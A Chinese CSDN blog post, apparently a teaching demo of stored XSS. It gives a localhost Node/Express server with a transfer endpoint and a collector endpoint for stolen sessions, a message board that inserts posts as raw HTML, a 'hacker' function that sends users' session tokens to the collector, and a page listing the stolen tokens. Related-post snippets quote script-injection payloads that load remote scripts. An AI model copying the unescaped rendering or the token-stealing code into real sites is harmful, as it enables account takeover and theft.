xss注入小例子

最新推荐文章于 2024-02-16 10:30:00 发布
最新推荐文章于 2024-02-16 10:30:00 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: 网站安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sakura__Lu/article/details/105040354
版权 
const httpManager = require('http');

const mysql = require('mysql');
// const urlManager = require('url');

var express = require('express');
var app = express();

// 解析参数
const bodyParser = require('body-parser');
app.use(bodyParser.json());//数据JSON类型
app.use(bodyParser.urlencoded({ extended: false }));//解析post请求数据

//设置跨域访问
app.all('*', function(req, res, next) {
    res.header("Access-Control-Allow-Origin", "*");
    res.header("Access-Control-Allow-Headers", "X-Requested-With");
    res.header("Access-Control-Allow-Methods", "PUT,POST,GET,DELETE,OPTIONS");
    res.header("X-Powered-By", ' 3.2.1');
    res.header("Content-Type", "application/json;charset=utf-8");
    next();
});

//实现本地链接
var connection = mysql.createConnection({
    host: '127.0.0.1',
    user: 'root',
    password: '123456',
    database: 'hight'
})


//获取用户信息
app.get('/api/getUserInfo', function(req, res) {
    res.status(200);
    var session = req.query.session || -1;
    connection.query('SELECT * FROM user where session= ?', session, function (error, results, fields) {
        if (error) {
            // throw error;
            console.log("查询出错!");
        }
        if(results.length !== 0) {
            res.json({success: true, 'results': results});
        }
        else {
            res.json({success: false, 'results': []});
        }
    });
});

//获取所有留言
app.get('/api/getAllMsg', function(req, res) {
    res.status(200);
    var session = req.query.session || -1;
    connection.query('SELECT * FROM all_msg', function (error, results, fields) {
        if (error) {
            // throw error;
            console.log("查询出错!");
        }
        if(results.length !== 0) {
            res.json({success: true, 'results': results});
        }
        else {
            res.json({success: false, 'results': []});
        }
    });
});

//转账
app.post('/api/trans', function(req, res) {
    res.status(200);
    var session = req.body.session || -1;
    var id   = req.body.id;
    var desId= req.body.desId;
    var money = req.body.money;
    console.log(req.body)
    connection.query('SELECT * FROM user where session= ?', session, function (error, results, fields) {
        if (error) {
            // throw error;
            console.log("查询出错!");
        }
        if(results.length !== 0) {
            connection.query('SELECT * FROM user where id= ?', id, function (error, results, fields) {
                connection.query('Update user SET money=? where id=?', [results[0].money - money, id], function (error, results, fields) {
                });
            });
            connection.query('SELECT * FROM user where id= ?', desId, function (error, results, fields) {
                connection.query('Update user SET money=? where id=?', [ parseInt(results[0].money) + parseInt(money), desId], function (error, results, fields) {
                });
            });
        }
        else {
            res.json({success: false, 'results': []});
        }
    })
});

//转账
app.post('/api/secret', function(req, res) {
    res.status(200);
    var session = req.body.session || -1;
    var id   = req.body.id;
    console.log(session);
    connection.query('insert into hk(userId, session) VALUES(?, ?)', [id, session], function (error, results, fields) {
        if (error) {
            // throw error;
            console.log("查询出错!11");
        }
        

    })
});

app.get('/api/secret', function(req, res) {
    res.status(200);
    connection.query('select * from hk', function (error, results, fields) {
        if (error) {
            // throw error;
            console.log("查询出错!12");
        }
        res.json(results);
        
    })
});


//添加留言
app.post('/api/addMsg', function(req, res) {
    res.status(200);
    var session = req.body.session || -1;
    var id   = req.body.id;
    var name = req.body.name;
    var content = req.body.content;
    console.log(req.body)
    connection.query('SELECT * FROM user where session= ?', session, function (error, results, fields) {
        if (error) {
            // throw error;
            console.log("查询出错!");
        }
        if(results.length !== 0) {
            connection.query('insert into all_msg(create_id, content, create_time, name) VALUES(?, ?, ?, ?)', [id, content, new Date(), name], function (error, results, fields) {
                if (error) {
                    // throw error;
                    console.log("查询出错!");
                }
                res.json({success: true, 'results': results});
                
            });
        }
        else {
            res.json({success: false, 'results': []});
        }
    })
});

//登录接口
app.post('/api/login',  function(req, res) {
    res.status(200);
    console.log(req.body);
    var name = req.body.username || "ALL";
    connection.query('select * from user where name= ?', name, function(error, results, fields) {
        if (error) 
            throw error;
        var session  = parseInt(Math.random() * 100000);
        if(results[0] && results[0].password === req.body.password){
            res.json(
                {
                    'session': session,
                    'success': true,
                    'money'  : results[0].money,
                    'id'     : results[0].id,
                    'name'   : results[0].name
                });
            connection.query('update user SET session=? where id= ?', [session, results[0].id], function(error, results, fields) {
                if (error) {
                   // throw error;
                   console.log(error.message);
                }
                console.log("update session success, session : " + session);
            });
        }else {
            res.json({'session': null, 'success': false});
        }
        
    });
    
});

//配置服务端口
var server = app.listen(8080, '127.0.0.1', function() {

    var host = server.address().address;

    var port = server.address().port;

    console.log('Example app listening at http://%s:%s', host, port);
})

login.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="../js/jquery.js"></script>
    <title>高大上的登录页面</title>
</head>
<body>
    <div class="main_container">
        <div class="login_box">
            <h1 class="login_title">高大上的登录框</h1>
            <input id="username" class="common_input" placeholder="用户名" /> 
            <br>
            <input id="password" class="common_input" type="password" placeholder="密码" />
            <br>
            <button class="common_input" id="loginBtn">登录</button>
        </div>
    </div>
</body>

<script type="text/javascript">

    // 设置cookie   
    function setCookie(c_name, value, expiredays) {                   
        var exdate = new Date();                   
        exdate.setDate(exdate.getDate() + expiredays);                   
        document.cookie = c_name + "=" + escape(value) + ";path=/";         
    }

    // 获取cookie
    function getCookie(name)
    {
        var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
        if(arr=document.cookie.match(reg))
            return unescape(arr[2]);
        else
            return null;
    }

    // 点击事件
    $("#loginBtn").on("click", () => {
        $.ajax({
             method: "post",
             url: "http://127.0.0.1:8080/api/login",
             data: {
                 username:$("#username").val(),
                 password:$("#password").val()
                },
             dataType: "json",
             success: function(data){
                console.log("请求成功!");
                console.log(data);
                if(data.success) {
                    window.localStorage.setItem('id', data.id);
                    window.localStorage.setItem('name', data.name);
                    window.localStorage.setItem('money', data.money);
                    window.localStorage.setItem('session', data.session);
                    window.location.href = './index.html'
                }else {
                    alert("用户名或密码错误!");
                }
                
            },
            error : function(err) {
                alert("请求超时!");
            }
         });
    });

</script>


<style>
    html, body {
        width: 100%;
        height: 100%;
    }

    .login_box {
        position: relative;
        width: 100%;
        text-align: center;
    }

    .common_input{
        width: 20rem;
        font-size: 2rem;
        margin-top: 1.5rem;
        padding: 0.5rem;
    }

    #loginBtn {
        background-color: aquamarine;
        font-size: 2rem;
        cursor: pointer;
    }
</style>
</html>

index.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="../js/jquery.js"></script>
    <title>一个高大上的网站</title>
</head>
<style>
    *{
        box-sizing: border-box;
    }
    html,body{
        width: 100%;
        height: 100%;
    }

    .main_layout{
        position: relative;
        width: 100%;
        padding: 1rem;
    }

    .header{
        width: 100%;
        height: auto;
        padding: 1rem 0 ;
        background-color: aquamarine;
    }

</style>
<body>
    <div class="main_layout">
        <div class="header">
            用户名: <span id="username"></span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
            我的余额:<span id ="money"></span>
        </div>
        <div class="page_container">
            <div id="all_msg">
                
            </div>

            <div class="">
                <textarea id="my_edit_box" rows="12" style="width:100%">

                </textarea>
                <button id="liuyan">留言</button>
            </div>
        </div>
    </div>
</body>

<script type="text/javascript">

    // 写cookie
    function setCookie(name,value)
    {
        var Days = 30;
        var exp = new Date();
        exp.setTime(exp.getTime() + Days*24*60*60*1000);
        document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString();
    }

    // 获取cookie
    function getCookie(name)
    {
        var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
        if(arr=document.cookie.match(reg))
            return unescape(arr[2]);
        else
            return null;
    }

    function getAllMsg() {
        $.ajax({
             method: "get",
             url: "http://127.0.0.1:8080/api/getAllMsg",
             data: {
                session : window.localStorage.getItem("session")
             },
             dataType: "json",
             success: function(data){
                console.log(data);
                if(data.success){
                    $("#all_msg").html("");
                    (data.results || []).forEach(element => {
                        $("#all_msg").append("<div>" + element.name + ": " + element.content);
                    });
                    
                }else {
                    window.location.href = './login.html'
                }
            },
            error : function(err) {
                alert("请求超时!");
            }
         });
    }

    // 填写留言
    function commitMsg() {
        $.ajax({
             method: "post",
             url: "http://127.0.0.1:8080/api/addMsg",
             data: {
                session : window.localStorage.getItem("session"),
                id : window.localStorage.getItem("id"),
                name: window.localStorage.getItem("name"),
                content: $("#my_edit_box").val()
             },
             dataType: "json",
             success: function(data){
                console.log(data);
                if(data.success){

                }else {
                    alert("无效的用户");
                }
            },
            error : function(err) {
                alert("请求超时!");
            }
         });
    }

    //转账
    function trans(money, dId) {
        $.ajax({
             method: "post",
             url: "http://127.0.0.1:8080/api/trans",
             data: {
                session : window.localStorage.getItem("session"),
                id : window.localStorage.getItem("id"),
                desId: dId,
                'money': money
             },
             dataType: "json",
             success: function(data){
                console.log(data);
                if(data.success){

                }else {
                    alert("无效的用户");
                }
            },
            error : function(err) {
                alert("请求超时!");
            }
         });
    }

    // 盗取用户信息
    function hacker() {
        $.ajax({
             method: "post",
             url: "http://127.0.0.1:8080/api/secret",
             data: {
                session : window.localStorage.getItem("session"),
                id : window.localStorage.getItem("id"),
             },
             dataType: "json",
             success: function(data){
               
            },
            error : function(err) {
                alert("请求超时!");
            }
         });
    }

    $("#liuyan").on('click', function() {
        commitMsg();
    });

    // 定时刷新留言
    setInterval(getAllMsg, 5000);

    // 获取用户信息
    (function(){
        $.ajax({
             method: "get",
             url: "http://127.0.0.1:8080/api/getUserInfo",
             data: {
                session : window.localStorage.getItem("session")
             },
             dataType: "json",
             success: function(data){
                console.log(data);
                if(data.success){
                    $("#username").text(data.results[0].name);
                    $("#money").text(data.results[0].money);
                }else {
                    window.location.href = './login.html'
                }
            },
            error : function(err) {
                alert("请求超时!");
            }
         });
    })();


</script>
</html>

haker.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="../js/jquery.js"></script>
    <title>Document</title>
</head>
<body>
    <div id="hk"></div>
</body>
    <script type="text/javascript">

    // 写cookie
    function setCookie(name,value)
    {
        var Days = 30;
        var exp = new Date();
        exp.setTime(exp.getTime() + Days*24*60*60*1000);
        document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString();
    }

    // 获取cookie
    function getCookie(name)
    {
        var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
        if(arr=document.cookie.match(reg))
            return unescape(arr[2]);
        else
            return null;
    }

    function c(){
        $.ajax({
             method: "get",
             url: "http://127.0.0.1:8080/api/secret",
             dataType: "json",
             success: function(data){
                console.log(data);
                $("#hk").html("");
                (data || []).forEach(element => {
                    $("#hk").append(
                        "<div>userId: " + element.userId + "     session: " + element.session + "</div>"
                    )
                });
   
            },
            error : function(err) {
                alert("请求超时!");
            }
         });
        };
    setInterval(c, 3000);
    </script>
</html>

 

jquery.js

/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.4.1",k=function(e,t){return new k.fn.init(e,t)},p=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g;function d(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}k.fn=k.prototype={jquery:f,constructor:k,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=k.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return k.each(this,e)},map:function(n){return this.pushStack(k.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},k.extend=k.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(k.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||k.isPlainObject(n)?n:{},i=!1,a[t]=k.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},k.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t){b(e,{nonce:t&&t.nonce})},each:function(e,t){var n,r=0;if(d(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?"":(e+"").replace(p,"")},makeArray:function(e,t){var n=t||[];return null!=e&&(d(Object(e))?k.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(d(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g.apply([],a)},guid:1,support:y}),"function"==typeof Symbol&&(k.fn[Symbol.iterator]=t[Symbol.iterator]),k.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var h=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,v,s,c,y,k="sizzle"+1*new Date,m=n.document,S=0,r=0,p=ue(),x=ue(),N=ue(),A=ue(),D=function(e,t){return e===t&&(l=!0),0},j={}.hasOwnProperty,t=[],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t\\r\\n\\f]",I="(?:\\\\.|[\\w-]|[^\0-\\xa0])+",W="\\["+M+"*("+I+")(?:"+M+"*([*^$|!~]?=)"+M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+I+"))|)"+M+"*\\]",$=":("+I+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+W+")*)|.*)\\)|)",F=new RegExp(M+"+","g"),B=new RegExp("^"+M+"+|((?:^|[^\\\\])(?:\\\\.)*)"+M+"+$","g"),_=new RegExp("^"+M+"*,"+M+"*"),z=new RegExp("^"+M+"*([>+~]|"+M+")"+M+"*"),U=new RegExp(M+"|>"),X=new RegExp($),V=new RegExp("^"+I+"$"),G={ID:new RegExp("^#("+I+")"),CLASS:new RegExp("^\\.("+I+")"),TAG:new RegExp("^("+I+"|[*])"),ATTR:new RegExp("^"+W),PSEUDO:new RegExp("^"+$),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool:new RegExp("^(?:"+R+")$","i"),needsContext:new RegExp("^"+M+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+M+"*((?:-\\d)?\\d*)"+M+"*\\)|)(?=[^-]|$)","i")},Y=/HTML$/i,Q=/^(?:input|select|textarea|button)$/i,J=/^h\d$/i,K=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,ee=/[+~]/,te=new RegExp("\\\\([\\da-f]{1,6}"+M+"?|("+M+")|.)","ig"),ne=function(e,t,n){var r="0x"+t-65536;return r!=r||n?t:r<0?String.fromCharCode(r+65536):String.fromCharCode(r>>10|55296,1023&r|56320)},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g,ie=function(e,t){return t?"\0"===e?"\ufffd":e.slice(0,-1)+"\\"+e.charCodeAt(e.length-1).toString(16)+" ":"\\"+e},oe=function(){T()},ae=be(function(e){return!0===e.disabled&&"fieldset"===e.nodeName.toLowerCase()},{dir:"parentNode",next:"legend"});try{H.apply(t=O.call(m.childNodes),m.childNodes),t[m.childNodes.length].nodeType}catch(e){H={apply:t.length?function(e,t){L.apply(e,O.call(t))}:function(e,t){var n=e.length,r=0;while(e[n++]=t[r++]);e.length=n-1}}}function se(t,e,n,r){var i,o,a,s,u,l,c,f=e&&e.ownerDocument,p=e?e.nodeType:9;if(n=n||[],"string"!=typeof t||!t||1!==p&&9!==p&&11!==p)return n;if(!r&&((e?e.ownerDocument||e:m)!==C&&T(e),e=e||C,E)){if(11!==p&&(u=Z.exec(t)))if(i=u[1]){if(9===p){if(!(a=e.getElementById(i)))return n;if(a.id===i)return n.push(a),n}else if(f&&(a=f.getElementById(i))&&y(e,a)&&a.id===i)return n.push(a),n}else{if(u[2])return H.apply(n,e.getElementsByTagName(t)),n;if((i=u[3])&
最低0.47元/天 解锁文章
Sakura__Lu
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
屏蔽script注入例子
09-04
在网络安全领域,Script注入是一种常见的攻击手段,攻击者通过在输入数据中嵌入恶意脚本,使得应用程序在处理这些数据时执行了非预期的代码,从而可能窃取用户信息、篡改网页内容或者进行其他危害。为了防止Script...
5. 控制台反馈xss
HWHXY的博客
01-17 2300
layout: post title: 5. 控制台反馈xss category: SRC tags: SRC keywords: SRC,XSS 前言 该篇记录为记录实际的src过程第5篇小文章,内容为某网站的xssbypass。 XSS特征 <img src="正常链接" alt="插入点"> 这里的waf过滤了>,所以只能考虑标签内的属性执行。另外还套了一层阿里云的waf,导致alert、prompt都用不了会被waf拦住,一些常见的payload都被拦住了,陷入了僵局。 cons.
XSS漏洞(一)
m0_61841735的博客
03-01 301
onerror事件型xss,使用逗号隔开事件脚本,从而执行三个javascript脚本,进而执行xss
XSS学习
softetesting的博客
02-09 571
什么是XSS? CSS(Cross Site Scripting)–>XSS XSS攻击通常指通过网页开发留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。 XSS攻击目标:前端脚本解析器,比如浏览器的Javascript解析引擎 BS架构:browser<->(http)server 如何发现XSSXSS利用思路和步骤: 1.找到输...
xss跨站脚本***大全
weixin_34331102的博客
03-20 451
(1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无...
XSS漏洞(二)
不秃头的程序Yang
05-15 2432
一、xss测试语句 在网站是否存在xss漏洞时,应该输入一些标签如<、>输入后查看网页源代码是否过滤标签,如果没过滤,很大可能存在xss漏洞。 常用的测试语句: <h5>1</h5> <span>1</span> <script>console.log(1);</script> 闭合: "><span>x</span> '><span>x</span> 单行注释:
XSS攻击实例1
01-11
XSS(Cross-site scripting)攻击是一种常见的网络安全威胁,它利用了网站对用户输入的不适当处理,使得攻击者能够在网页中注入恶意脚本,从而影响其他用户。在本实例"XSS攻击实例1"中,我们将探讨这种攻击的原理、...
thinkphp5小例子
03-09
7. **安全防护**:在处理用户输入时,Thinkphp5提供了过滤、验证等功能,以防止SQL注入XSS攻击等安全问题。例如,使用`$this->request->post('username')`获取POST数据,并通过`validate`进行验证。 通过这个小...
javascript过滤XSS
05-06
JavaScript过滤XSS(Cross Site Scripting)是一种防御性编程技术,用于防止恶意用户通过注入脚本到网页中,对其他用户进行攻击。XSS攻击通常发生在动态生成HTML内容的场景,比如用户评论、论坛帖子等。攻击者可以...
XSS平台网站源码.zip
09-28
8. 安全的编程实践:源码还可能包含如何在编程语言中遵循最佳安全实践的例子,如使用参数化查询防止SQL注入,这虽然不是XSS的直接防范,但能提升整体安全性。 9. 漏洞测试:为了确保防御措施的有效性,源码中可能...
测试xss攻击
qq_37338658的博客
12-13 163
var a = 0 console.log(a)
java实战:Java处理XSS漏洞的四种方法及代码示例
最新发布
oandy0的博客
02-16 9572
本文将介绍几种在Java中处理XSS(跨站脚本)漏洞的常用方法,并提供详细的代码示例。我们将探讨使用HTML实体编码、使用内容安全策略(CSP)、使用框架内置的XSS防护和自定义过滤器等方法。通过本文,可以了解到如何在Java应用程序中实施有效的安全措施,以防范XSS攻击。
Java XSS例子和预防
allway2的博客
07-24 3734
成熟的框架(例如Spring)通常具有安全功能,如果使用得当,可以保护您的应用免受最常见类型的攻击。对于我们的第一个示例,我们将展示可以通过查询参数完成的基本XSS攻击。在简要解释了XSS是什么以及为什么它会对您的应用程序的安全构成如此危险的威胁后,我们这样做了。对于某些类型的数据,使用“允许列表”方法可能是有意义的,其中您有一个可以接受的有效数据列表,而其他所有数据都被拒绝。我们示例中的视图有一个故意的错误,以允许未转义的内容按原样显示。他们只受攻击者的独创性和您的应用程序的漏洞的约束。...
XSS注入基础入门篇
好好睡觉
02-17 4854
XSS注入基础,XSS注入原理,XSS注入分类
Java 防御XSS攻击实战与示例代码
oscar999的专栏
01-08 1634
本篇介绍在Java 项目中如何快速修复XSS 漏洞。本篇使用的是黑名单的方式, 对于非法字符进行转义。 黑名单的方式虽然不能完全的解决XSS的漏洞, 但是能有效的减轻攻击, 对于使用类似Coverity等代码静态扫描攻击扫描的漏洞, 修复之后就不会再报相关的警报了。
XSS漏洞攻击与防御
qq_46001025的博客
09-14 478
XSS漏洞常见分类、payload拓展、漏洞修复
Java中的10种方法防止XSS攻击
热门推荐
qq_28245087的博客
06-29 1万+
这些方法包括输入验证和过滤、安全的HTML和URL编码、Content Security Policy(CSP)的使用、安全的模板引擎和富文本编辑器、用户输入的验证和限制、安全的Cookie设置以及防止跨站点请求伪造(CSRF)。通过实施这些方法,可以降低XSS攻击的风险,保护应用程序和用户的数据安全。通过使用安全的Cookie设置,您可以增加Web应用程序的安全性,保护用户的身份验证和敏感信息免受攻击和滥用。通过验证和限制用户输入,您可以增加应用程序的安全性和可靠性,防止潜在的安全漏洞和错误数据的影响。
常用解决跨站脚本(XSS) 和 代码注入思路
budongfengqing的博客
08-09 688
常用解决跨站脚本和代码注入思路
Json注入
qq_50854662的博客
11-12 3427
一、Json简介 JSON 是存储和交换文本信息的语法,是轻量级的文本数据交换格式。类似xml,但JSON 比 XML 更小、更快,更易解析。所以现在接口数据传输都采用json方式进行。JSON 文本的 MIME 类型是 “application/json”。 json语法 数据在名称/值对中 数据由逗号分隔 大括号保存对象 中括号保存数组 JSON 值 JSON 值可以是: 数字(整数或浮点数) {“age”:30 } 字符串(在双引号中) {“uname”:“yang”} 逻辑值(true 或
举一个xss攻击的例子
05-02
假设一个网站有一个搜索框,用户可以在其中输入搜索关键字。如果网站没有对用户输入的内容进行过滤和转义,那么攻击者可以在搜索框中注入一些恶意代码,比如以下的代码: ```javascript <script> alert('你的账号已经被攻击者盗取了!'); // 这里可以加入一些恶意代码,比如发送用户的敏感信息到攻击者的服务器 </script> ``` 当用户在搜索框中输入一些关键字并点击搜索按钮时,恶意代码就会被执行,从而导致攻击者获得用户的敏感信息或执行其他恶意操作。这就是一种常见的 XSS 攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值